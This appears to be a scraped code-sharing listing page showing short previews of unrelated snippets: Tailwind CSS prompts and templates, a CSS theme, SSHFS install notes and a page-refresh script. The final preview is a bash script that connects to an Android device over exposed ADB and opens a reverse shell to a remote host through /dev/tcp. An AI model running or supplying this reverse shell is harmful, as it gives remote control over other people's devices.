Note: Use
$...$
for inline math and$$...$$
or\[...\]
for display math.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Tailwind CSS Expert Assistant System Prompt | |
You are a Tailwind CSS Expert Assistant designed for a full-stack developer who can produce desired visuals but sometimes needs guidance on advanced CSS techniques and optimal Tailwind patterns. Your user has solid fundamentals but may not always know the most efficient or modern approaches to achieve complex layouts and styling. | |
## Your Role & Expertise | |
You are an advanced Tailwind CSS consultant with deep knowledge across: | |
- **Tailwind CSS Mastery**: Advanced utility patterns, configuration, customization, and optimization | |
- **Modern CSS**: Grid, Flexbox, Container Queries, CSS Custom Properties, modern selectors | |
- **Design Systems**: Component libraries, design tokens, scalable architecture patterns |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
This is a Tailwind CSS playground template. | |
You can use this template to play with Tailwind CSS. | |
--- | |
⚠️ IMPORTANT: | |
Do not use this template for production. | |
--> | |
<!doctype html> | |
<html> | |
<head> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
After multiple attempts to have a verbatim conversion of PDF to Markdown file, the following prompt worked nicely. | |
Feel free to add or suggest improvements. | |
``` | |
**Objective:** Convert the attached PDF to Markdown **verbatim** without summarizing, omitting, or altering any content. Follow this exact workflow: | |
#### **Phase 1: Document Analysis** | |
1. **Read Entire PDF** | |
- Process all pages sequentially. Do **not** skip pages or sections. | |
- Preserve every paragraph, table row, and code snippet - **no exceptions**. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
body { | |
--file-line-width: 1280px; /* Doucment width */ | |
/* ----------------------------------- | |
* Colors override | |
* ---------------------------------- */ | |
--color-base-00: #2c292d; | |
--color-orange: blue; | |
--bold-color: var(--color-purple); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# --------------------------------------------------- | |
# SSHFS is file system client based on SSH | |
# --------------------------------------------------- | |
# Install SSHFS on Ubuntu | |
# --------------------------------------------------- | |
sudo apt install sshfs | |
# Install SSHFS on Mac OSX | |
# --------------------------------------------------- |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
const TIME_TO_STALE = 12 * 60 * 60 * 1000; // 12 hours in milliseconds | |
window.onload = () => { | |
localStorage.setItem('lastLoadTime', Date.now()); | |
}; | |
// Refresh website after 12 hours | |
document.addEventListener('visibilitychange', () => { | |
const currentTime = Date.now().getTime(); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first. | |
# By Random_Robbie | |
adb connect $1:5555 | |
adb shell sh -i >& /dev/tcp/$2/4444 0>&1 | |
echo "[*] Should have a shell now ..... Be nice :) [*]" |
NewerOlder